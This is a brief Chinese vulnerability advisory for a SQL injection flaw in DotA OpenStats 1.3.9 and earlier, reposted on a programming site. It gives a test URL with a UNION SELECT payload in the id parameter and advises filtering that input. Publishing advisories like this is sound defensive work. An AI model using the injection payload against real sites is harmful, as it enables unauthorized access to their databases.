好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

DotA OpenStats <= 1.3.9 SQL注射及修复 - 网站安全

 

标题: DotA OpenStats SQL Injection Vulnerability

作者: HvM17 www.2cto.com

影响版本: 1.3.9及以下

测试平台: WinXP

 

开发者: http://openstats.iz.rs/

程序 下载 : https://sourceforge.net/projects/dotaopenstats/

=============

测试示例

        

        http://www.2cto.com /dotaStats/index.php?id='1 UNION SELECT 1,2,3,4

        

www.2cto.com修复:

 基本的,过滤index.php的id参数输入

查看更多关于DotA OpenStats <= 1.3.9 SQL注射及修复 - 网站安全的详细内容...

  阅读:47次